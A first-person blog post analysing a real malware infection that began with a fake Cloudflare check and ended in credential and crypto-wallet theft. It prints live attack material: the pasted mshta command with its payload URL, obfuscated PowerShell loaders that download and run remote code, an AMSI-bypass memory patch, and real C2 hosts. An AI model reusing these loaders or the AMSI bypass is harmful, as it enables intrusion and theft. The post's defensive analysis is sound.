Press enter or click to view image in full size
As a CTF player, I’ve spent my fair share of time solving puzzles, inspecting vulnerabilities, and breaking RSA for the billionth time. I always thought my first malware analysis would come from a CTF challenge or perhaps an ominous-looking file I downloaded on purpose in the name of research. Little did I know, this initiation would come in the most unexpected way: my roommate accidentally infected my own machine.
At first, I thought this was going to be just another hackneyed virus: some ransomware or one of the several moronic viruses making rounds lately. But as I got to analysis, I realized this was something far more sophisticated— a piece of malware partially written by AI, buried under layers upon layers of obscure encipherment. It could steal credentials, hijack your crypto wallets, or even give them remote access! Even worse, it was intentionally designed to evade detection and wipe out every last trace of any antivirus software, leading to a nightmare in analysis and containment.
This article chronicles my first experience with malware analysis in the wild; how I de-obfuscated, decrypted, and finally analyzed a piece of AI-enhanced malware that turned my own PC into a battleground. If you’re dying to know what it feels like to analyze malware for the first time, here’s what I learned the hard way.
The Initial Infection
It all started innocently enough. My roommate was browsing WallpaperFlare (with Brave AdBlock turned off), looking for a new background to spice up my desktop. In the barrage of redirect ad pages on every single click, one ominous page claimed to be a Cloudflare human verification page to “view the full resolution wallpaper”.
Seems innocent enough, right? Well, not until it asks you to press Win+R, Ctrl+V, then Enter.
For starters, the webpage is running on this URL:
https://snowy-dew-4512.fly.storage.tigris.dev/garden-bloom-alltop.html?
X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=...Revealing that it was hosted on an Amazon S3 bucket via Tigris.dev, with a signed, time-limited link regenerating every six days. Red flag number one. And what it’s asking you to paste in your Run dialogue box is even more sinister:
mshta https://update33.oss-ap-southeast-3.aliyuncs.com/ruketop.mp4The use of mshta.exe (Microsoft HTML Application Host) to execute a remote script disguised as an MP4 was the final giveaway that what I just stumbled upon is indeed malware. But the real fun started when I checked what this command actually did. But how did this command find itself in your clipboard automagically? Remember that Cloudflare Checkbox from earlier? Well, it has some JavaScript behind it that injects the payload into your clipboard when pressed, bypassing Brave’s clipboard access permission.
Sneaky MP4
The content of that “video” essentially boils down to this command:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function XUrEwylZj($iFBqsYQLj){-split($iFBqsYQLj -replace '..', '0x$& ')};$JLlUw=XUrEwylZj('DE6...6');$RzJH=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((XUrEwylZj('58445875696A4E534D746B4B6D4F636F')),[byte[]]::new(16)).TransformFinalBlock($JLlUw,0,$JLlUw.Length)); & $RzJH.Substring(0,3) $RzJH.Substring(3)In an attempt to hide its tracks, the functionality of this payload is hidden behind AES encryption. However, the decryption key is hardcoded in plaintext, and all we have to do is decode it using CyberChef to get this:
iexStart-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ArgumentList '-w','hidden','-ep','bypass','-nop','-Command','Set-Variable 8 (((([Net.WebClient]::New()|GM)|Where-Object{$_.Name-clike''*nl*g''}).Name));Set-Item Variable:SQ ''https://ddddd.kliprexep.shop/provider.png'';Set-Variable t ([Net.WebClient]::New());(Get-Variable t).Value.((GI Variable:8).Value)((Variable SQ).Value)|&$ExecutionContext.InvokeCommand.((($ExecutionContext.InvokeCommand|GM)|Where-Object{$_.Name-clike''*nd''}).Name)($ExecutionContext.InvokeCommand.((($ExecutionContext.InvokeCommand|GM)|Where-Object{$_.Name-clike''G*om*e''}).Name)(''I*e-E*'',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)';$ZORLsa = $env:AppData;function VEIDBHN($NpzOV, $Wckzz){curl $NpzOV -o $Wckzz};function IUsjsWkC(){function PjxsBuxl($nEZI){if(!(Test-Path -Path $Wckzz)){VEIDBHN $nEZI $Wckzz}}}IUsjsWkC;Yet another redirect… It’ll become more apparent that this hunt is a constant game of whack-a-mole, from payload to payload, just so analysts (and curious amateurs — like myself) have a harder time following its tracks. I’m not giving up that easily, though. Following the given URL ‘https://ddddd.kliprexep.shop/provider.png' reveals another piece of PowerShell code hidden in ‘provider.png’, which is hosted on an Alibaba Cloud instance. This is the second Cloud provider so far to be involved in this operation, which raises questions about the responsibility these providers bear for ensuring the integrity and ethical use of their services.
The Breaking Point
So far, the encryption has been pretty easy to unravel. But what the following script demonstrated is beyond anything I’ve seen before. To put it in perspective, here are a few lines of what’s hidden inside provider.png:
$yCeTpHtuWWmOBbTtveDSb = (((-2932 - $hvFeWDKyNAdyZWtFpA) * 7) - (((((((($cXueVwghQBBOdBkDDMI * $GgcnQpjrXPtskMEtEfVV) - -491) * (((-9 - ((((($gWIyKBBmRMkZF - $iTHGZzbTpFkss) + -352) - -66479) + $iTHGZzbTpFkss))) - $yCeTpHtuWWmOBbTtveDSb))) + ((((-8 + $ZoocmUAPHKPwvly) + 954) + 8400))) - $JsMQdILggNdVJpU)) * ((126 + ((((($QMaBzLFPnqlThxHEGocrF * $DQXmXQYRr) - $qyshygEkVqBYepDx) * -638) - 7222))) * ((($LZakiSayQVU + -492) * 67168))))))
if ((8105 -ge 5371) -or ($ZoocmUAPHKPwvly -gt $cXueVwghQBBOdBkDDMI) -or (-131 -gt -5072) -or ($hvFeWDKyNAdyZWtFpA -ne $QMaBzLFPnqlThxHEGocrF)) {
$DQXmXQYRr = (((-64 + $GgcnQpjrXPtskMEtEfVV) + 3908) + $qyshygEkVqBYepDx)
}This keeps going for 21000 lines of heavily obfuscated Powershell. I almost gave up at this point. Powershell de-obfuscation tools failed to clear it up, and making sense of it is borderline impossible.
In a final shot in the dark, I decided to skim through all of its content to find anything that could potentially hint at its operations, and then I found this:
[Byte[]]$aUtQSSCqYrvXfAc = 83,50,53,122,68,84,111,48,76,68,48,119,98,66,99,119,73...;Jackpot! If you think about it, no one can predict the outcome of thousands of variable declarations and random operations — not even this malware’s creators. So it kinda makes sense to hardcode the intended payload somewhere and wrap it with overblown nonsensical operations. This is also the only Bytearray declared in the whole script, which makes me pretty confident that I’m on the right path. Converting it to ASCII reveals a Base64 encoded…thing. It’s encrypted, but how? Luckily, these hackers did most of the hard work for us by declaring the decryption function right below the bytearray! Here’s the de-obfuscated decryption function:
function malicious_func {
b64_char_array = New-Object System.Collections.ArrayList;
for (iterator_1 = 0; iterator_1 -le b64_int_array.Length-1; iterator_1++) {
b64_char_array.Add([char]b64_int_array[iterator_1]) | Out-Null};
b64_string = b64_char_array -join "";
utf8_object = [System.Text.Encoding]::UTF8;
xor_key = utf8_object.GetBytes("$srsIVwKhvnlaG");
# $srsIVwKhvnlaG contains the xor key
encoded_str_script = utf8_object.GetString([System.Convert]::FromBase64String(b64_string));
encoded_bytes_script = utf8_object.GetBytes(encoded_str_script);
decoded_str_script = $(for (iterator_1 = 0; iterator_1 -lt encoded_bytes_script.length; ) {
for (iterator_2 = 0; iterator_2 -lt xor_key.length; iterator_2++) {
encoded_bytes_script[iterator_1] -bxor xor_key[iterator_2];
iterator_1++;
if (iterator_1 -ge encoded_bytes_script.Length) {
iterator_2 = xor_key.length
}
}
});
decoded_str_script = utf8_object.GetString(decoded_str_script);
return decoded_str_script
}What this does is essentially XOR-decrypting the B64 array with whatever is contained in “$srsIVwKhvnlaG”. Running a modified version of the payload destined to print out some variables used in the declaration of “$srs…” reveals:
$fQAannmsnLQMvPPOBqzIt = Ref
$TQgtdPDzRZBEF = Assembly
$DogeeNrntxIfh = GetType
$ImhEWTMkyGj = System.Management.Automation.AmsiUtils
$ikZBcrfaKwzODjOvmsw = GetMethod
$efnMFROypb = ScanContent
$IqtXuIaExk = Reflection.BindingFlags
$AOUmZCEmQSJvgXxwo = NonPublic
$PvULhwXjeNigR = Static
$MdWKsNKXf = Invoke
$TgUvFtEZEA =
$ZWkKSNWgaO = Invoke-Mimikatz
$fhvXTGGsguJpktLYBKsvb =
[Decryption Key] = AMSI_RESULT_NOT_DETECTEDNot only does this reveal the XOR-key, which is dynamically generated using reflection to bypass AMSI (Antimalware Scan Interface) protections, but it is also this malware’s first attempt to actually do something. It invokes Mimikatz, A tool designed to extract plaintext passwords, hashes, and other sensitive information from memory. Now things are getting spicy!
AI Switching Sides
Going forward with the decryption reveals the final mole we have to whack; Another PowerShell script. Thankfully, this one wasn’t obfuscated, but it revealed something that honestly shocked me:
# Define Constants
$PAGE_READONLY = 0x02
...# Helper functions
function IsReadable {
param ($protect, $state)
return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT)
}
function PatternMatch {
param ($buffer, $pattern, $index)
for ($i = 0; $i -lt $pattern.Length; $i++) {
if ($buffer[$index + $i] -ne $pattern[$i]) {
return $false
}
}
return $true
}
if ($PSVersionTable.PSVersion.Major -gt 2) {
# Create module builder
$DynAssembly = New-Object System.Reflection.AssemblyName("Win32")
...
# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
...
# P/Invoke Methods
$TypeBuilder = $ModuleBuilder.DefineType("Win32.Kernel32", "Public, Class")
...
# Define [Win32.Kernel32]::VirtualProtect
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualProtect", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [bool], [Type[]]@([IntPtr], [IntPtr], [Int32], [Int32].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
...
$a = "Ams"
$b = "iSc"
$c = "anBuf"
$d = "fer"
$signature = [System.Text.Encoding]::UTF8.GetBytes($a + $b + $c + $d)
$hProcess = [Win32.Kernel32]::GetCurrentProcess()
# Get system information
$sysInfo = New-Object Win32.SYSTEM_INFO
[void][Win32.Kernel32]::GetSystemInfo([ref]$sysInfo)
# List of memory regions to scan
$memoryRegions = @()
$address = [IntPtr]::Zero
# Scan through memory regions
while ($address.ToInt64() -lt $sysInfo.lpMaximumApplicationAddress.ToInt64()) {
$memInfo = New-Object Win32.MEMORY_INFO_BASIC
if ([Win32.Kernel32]::VirtualQuery($address, [ref]$memInfo, [System.Runtime.InteropServices.Marshal]::SizeOf($memInfo))) {
$memoryRegions += $memInfo
}
# Move to the next memory region
$address = New-Object IntPtr($memInfo.BaseAddress.ToInt64() + $memInfo.RegionSize.ToInt64())
}
$count = 0
# Loop through memory regions
foreach ($region in $memoryRegions) {
# Check if the region is readable and writable
if (-not (IsReadable $region.Protect $region.State)) {
continue
}
# Check if the region contains a mapped file
...
I didn’t add those comments; you can decode it yourself and verify. That code is, in fact, AI Generated! In order to ease my suspicions, I used some online AI code detectors, which signaled a high likelihood of being AI generated (AI Code Decoder GPT, for instance, gave it a %75 chance of being AI generated!).
The script first searches for the AmsiScanBuffer function in memory and overwrites its bytes with zeroes, effectively disabling AMSI, effectively allowing the malware to execute without being detected by antivirus software.
What truly frightens me, however, is that this complex, low-level, and blatantly malicious piece of code was produced by an AI model with no questions asked. Threat actors are historically one step ahead of white-hat defensive forces. And with the current rate of advancements in artificial intelligence and rising threats of cybercrime, if these threat actors could leverage its capabilities so easily and effectively to forge even more sophisticated exploits going forward, we’ll be looking at a much darker landscape when it comes to security and cyber threats going forward.
The Sauce
Decoding the byte array didn’t only give us that wonderful gift from the AI gods; That was no more than clearing the way for the actual malware that wreaked havoc on my poor PC. Going further below, we’ll find a piece of Base64 encoded .NET assembly code. Wrapping it back to an executable reveals the star of the show: Riddsheyzz.exe. Looking this one up revealed nothing online (the Any.run results you’ll find were run by me and weren’t previously available).
Static Analysis
In an attempt to unveil its inner workings, I proceeded to disassemble it with Binary Ninja. Aside from some plaintext symbols, most of the bread-and-butter functions appear to be packed (meaning that they don’t reveal their underlying functions in disassembly) and obfuscated under some random names:
...
System.Core
FirstOrDefault
IEnumerable`1
System.Collections.Generic
GetTypeFromHandle
RuntimeTypeHandle
CreateDelegate
Delegate
Invoke
SendProfile
AnalyzeScalableProfile
_SymbolicProxy
m_TransformableProxy
IncludeProfile
InterceptSortedProxy
MethodBase
GetParameters
ParameterInfo
get_ReturnType
op_Equality
MemberInfo
get_Name
AnalyzeVisualProfile
MonitorAccessibleProfile
m_8175b0abecbf4cf8b2033c0673faa5d0
m_f618de55b4c646efad1ff15c17b98e04
m_616dbdf0b65e4842bcf599edb16f190f
m_060589a3efde4b57ad4dd305598ae71c
m_79fa787b8cf94cc293f9b7a6f3dc819f
m_d04ee20d7d384f1ca858d25983d7423f
m_dfd6db8e0450465cb01fe67108a2c4e8
m_8073c124b6784dd7bf35fcc316d273b9
m_4da70eca30714de2afe8489f99825644
m_eca40d22fa5547a7b9e9bab4bace0477
m_ba72f663ceca4ec0a459e537cb786ad3
...Some other symbols that I’ve found import cryptographic functions and libraries such as System.Security.Cryptography, SymmetricAlgorithm, set_Key (implying further AES encryptions) aswell as HTTP libraries for network communications (HttpClient, System.Net.Http…).
A suspicious PDF file also seems to be downloaded when the malware is executed. This one is also hosted on a legitimate file hosting service, Mediafire.
https://www.mediafire.com/file_premium/ishws3ttw6w5w07/wqnow.pdf/fI downloaded it manually, but it seems to be encrypted code— most likely using the AES function imported above.
As for the obfuscated functions, however, it would be a challenging task to unveil their underlying code. Since they are unpacked when loaded into memory, it would be possible to run the malware in a sandbox, dump the memory, and then analyze it with something like Volatility3. I tried, but with my limited experience using Volatility, I’ve decided that it would be less of a headache to dynamically analyze what it’s doing rather than reverse engineer the binary itself — there is a reason why I play crypto and not forensics in CTF challenges!
Any Run it
Before setting up my mini malware lab, I threw it onto Any.Run for a quick summary of what it’s doing. At first, it seemed to perform some suspicious DNS queries, but nothing too dangerous. This is a dead giveaway that it’s detecting the sandbox environment and refusing to run — pretty smart, but not too smart. With the help of one of my friends, we managed to “convince it” to reveal its true actions. Lo and behold, this thing exploits everything under the sun!
Where do I start? It’s a Lumma Stealer (Steals all passwords saved by your browser), a Remote Access Trojan (running with Arechclient2 and AutoIT), a Crypto Wallet Stealer, a Backdoor, Automatic Startup, Sleeper… you name it. It also uninstalls your antivirus, disables your browser (presumably to stop you from changing your passwords), corrupts any past restore points to make recovery even harder, and makes your machine a part of a botnet. Add in a crypto miner and this thing will be a whole buffet!
Here’s the full analysis given by Any.Run if you’re curious. Despite it being quite informative, I still wanted to conduct my own dynamic analysis in a windows VM.
Network Analysis
I proceeded to set up a sandbox VM with Wireshark and MitmProxy to analyze network traffic and decrypt TLS packets.
It proceeded to query for numerous Botnet C&C (Command and Control) Domains. Most of them seem to have redirected to newer IPs as of writing this which makes them harder to track down.
Analyzing the pcap file in Wireshark reveals, after a series of attempted SSL Certificate forgery, the primary CnC server; one hosted on the IP 185.147.124.181. Tracing it back leads us to a datacenter in Moscow, Russia, belonging to a company called Almira LLC. At first glance, they appear to be a legitimate business, but some recent reports I’ve found suggest otherwise.
Further examination of the network activity reveals another suspicious IP address: 185.195.97.57. A total of 14 MB of data has been exchanged between it and my machine, suggesting more than a mere server handshake. This one also belongs to an offshore data center, this time in Madrid, Spain, and belongs to a company called GrupoDW. This connection is reinforced by the fact that the link to a “grupodw” admin dashboard login page was present in one of the packets sent by the malware, which further raises my suspicions.
I wanted to go further and “CTF” my way into their servers, but as they appear to be potentially legitimate and exploited businesses, even if most of the evidence says otherwise, I don’t find it ethical to illegally breach into their backend just to conduct a vigilante investigation. The best I can do is contact them to ask for a comment.
Dynamic Analysis
After analyzing the network activity and concluding that “Yes, it’s sending stuff to Russia”, what is it sending exactly? To get some deeper insight into what it’s doing behind the scenes, I set up Sysmon to constantly log its activities, as well as ProcMon to get better real-time readings on what it’s doing.
First of all, it proceeds to read all my System Certificates to steal private keys, as well as inject Custom Root Certificates to intercept and decrypt all HTTP traffic going through that machine (which is pretty much like sharing your screen with them).
After that’s done, playtime begins! The malware proceeds to read the User Data stored in every browser imaginable (bye-bye passwords!). Even though these passwords are encrypted, they’re encrypted with Windows’s DPAPI, which uses a key tied to the user’s Windows session — all good right? Well, guess who also has access to your user session…yeah.
Press enter or click to view image in full size
Now that all my accounts are compromised, what else could be of value? Crypto Wallets! While valuable, they don’t have a set location. So what’s the best thing to do? Bruteforce through the entire user directory for anything that contains the words kbdx, trezor, seed, pass, ledger, metamask, bitcoin, words, and wallet.
Press enter or click to view image in full size
With crypto in our pocket, what else could the malware do? That’s right! Session keys! We’re talking AWS, FTP, GCloud, Azure, and…Telegram, Discord, and Steam? Anyway, even Email Clients could be of value, so it takes anything it could find regarding The Bat!, Outlook, WMS, and PMail as well as access keys for Remote Desktop Software such as UltraVNC.
Then, it proceeds to route them to homellygage.biz through Cloudflare (who should do a better job at monitoring their servers) which points back to that Russian data center from earlier.
Press enter or click to view image in full size
Again, you’ll find all the findings throughout this investigation, including this very procmon log file in the GitHub repo.
Other than rummaging through my disk and looting whatever it could find, this malware also drops two executables with random names in the Temp directory. I theorize that they have been dropped from that PDF file downloaded earlier from Mediafire, but I haven’t fully confirmed that.
These, in turn, proceed to drop another executable titled Maui.exe which invokes a known Arechclient2, called jsc.exe.
The Bigger Picture: How this Malware Works
.1 Drive-by Execution: A phishing site that tricks the user into executing a clipboard-injected mshta command, bypassing browser security.
.2 Obfuscated PowerShell Execution: Downloading multiple encrypted payloads and decoding them in runtime.
.3 Disabling the Antivirus: Erasing any trace of the Antimalware Scan Interface in the memory— thanks ChatGPT!
.4 Stealing Data: Passwords, certificates, wallets… you get the gist.
.5 RAT Deployment: Connection to an attacker-controlled server through a reverse shell on the victim’s machine.
The Role of Legitimate Services in Malware Operations
One of the most troubling aspects of this campaign was its abuse of legitimate services like Cloudflare, AWS, Alibaba Cloud, and Mediafire. These platforms, designed to provide scalability and reliability, were weaponized to host malicious content and mask its footsteps.
For instance, the malware’s use of AWS S3 buckets and Alibaba Cloud’s OSS (Object Storage Service) highlights how cloud platforms can inadvertently facilitate cybercrime. While the sheer scale of their operations could understandably make detection of malicious activity pretty tough, stricter enforcement and collaboration with cybersecurity researchers are essential to address this issue.
Mediafire’s hosting service was also utilized in bad faith to distribute malicious payloads, which underscores the need for more robust security measures.
And when it comes to Cloudflare, even though they’ve been impersonated in the phishing operation, they are partially responsible for providing a reverse proxy to the attacker’s server and routing traffic anonymously. This begs the question about the responsibility of service providers to balance user privacy with security. While Cloudflare has abuse reporting mechanisms, more proactive measures — such as automated scanning for malicious content — could help curb abuse.
Let’s not forget about Wallpaper Flare, a top-ranking website when you search for the all-common term “wallpaper” in any search engine, which acted as the stepping stone for this malware to sneak its way into people’s clipboards. AD revenue is undoubtedly a necessity for any free service to stay afloat, but when it comes to willingly delivering actual phishing pages, that’s where the line needs to be drawn.
In essence, while these services are not inherently malicious, their widespread availability and ease of use make them attractive to attackers. In return, they should take greater responsibility by implementing stricter abuse detection and prevention mechanisms, educating users about the risks of hosting unverified content, or simply not delivering blatant malware on their damn website!
The Growing Role of AI in Malware Development
Perhaps the most striking revelation from this investigation was the use of AI-generated code in the malware. The structure of the obfuscated Powershell snippet which disables AMSI — a critical part of this malware’s antivirus evasion mechanism — is highly indicative of AI involvement.
This pans out to be a game-changer in the cybersecurity realm. The use of AI to supercharge and develop malware lowers the barrier to entry for cybercriminals, enabling even less skilled attackers to create sophisticated malware. It also accelerates the development cycle, allowing attackers to deploy new variants at an unprecedented pace. Most concerningly, AI-generated code can evade signature-based detection systems, rendering traditional antivirus solutions less effective.
While guard rails are being progressively set up to safeguard AI from malicious use cases, the weaponization of AI in this campaign underscores the urgent need for stricter regulations on AI tools and platforms.
Conclusion: Learn your Lesson!
Before blaming cloud providers and hosting services, it should be noted that, when falling victim to a malware attack, %90 of the blame falls on YOU! Yes, I am liable in this case for not locking my computer when AFK, but this extends to general education regarding cybersecurity and good security practices. So what could you learn from my experience?
- Enable AdBlockers: Many phishing sites, like this one, get signaled off by most adblockers — I just happen to have mine off at the time of this attack. Also, who likes ads anyway?
- Disable automatic password saving in your browser.
- Restrict execution of scripting engines like PowerShell and mshta where possible.
- Get in sync with the evolving landscape of cybersecurity.
- Avoid ANYTHING Shady: This includes shady links, QR codes, actions (like Win+R in this case), and programs. If anything makes you think twice, step back from it — and you should always think twice!
- I can’t stress this one enough: Use Linux! It’s better… IT’S JUST BETTER! I was only logged on to windows in this instance to use Adobe products, but %99 of the time, you should be on Linux (unless you want to play League of Legends, then…why?).
In the end, curiosity didn’t kill the cat, but it did expose an elaborate malware scheme lurking in an unexpected corner of the web. Stay safe, Stay vigilant!